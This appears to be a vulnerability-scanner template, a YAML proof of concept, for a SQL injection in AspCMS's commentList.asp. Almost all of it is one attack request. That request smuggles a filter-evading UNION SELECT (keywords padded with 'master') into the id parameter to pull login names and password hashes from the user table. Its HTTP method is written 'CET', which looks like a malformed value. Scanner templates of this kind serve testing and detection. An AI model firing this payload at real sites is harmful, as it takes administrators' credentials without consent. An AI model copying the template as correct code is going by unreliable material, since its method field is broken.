id: aspcms-commentlist-sql-injection

info:
  name: AspCMS commentList.asp SQL注入漏洞
  author: daffainfo
  severity: high
  verified: false
  description: AspCMS commentList.asp 存在SQL注入漏洞，攻击者通过漏洞可以获取管理员md5的密码 app="ASPCMS"
  reference:
    - https://github.com/Threekiii/Awesome-POC/blob/master/CMS%E6%BC%8F%E6%B4%9E/AspCMS%20commentList.asp%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md

rules:
  r0:
    request:
      method: CET
      path: /plug/comment/commentList.asp?id=-1%20unmasterion%20semasterlect%20top%201%20UserID,GroupID,LoginName,Password,now(),null,1%20%20frmasterom%20{prefix}user
    expression: response.status == 200 && response.body.bcontains(b'<div class=line1>') && response.body.bcontains(b'<div class=line2>')
expression: r0()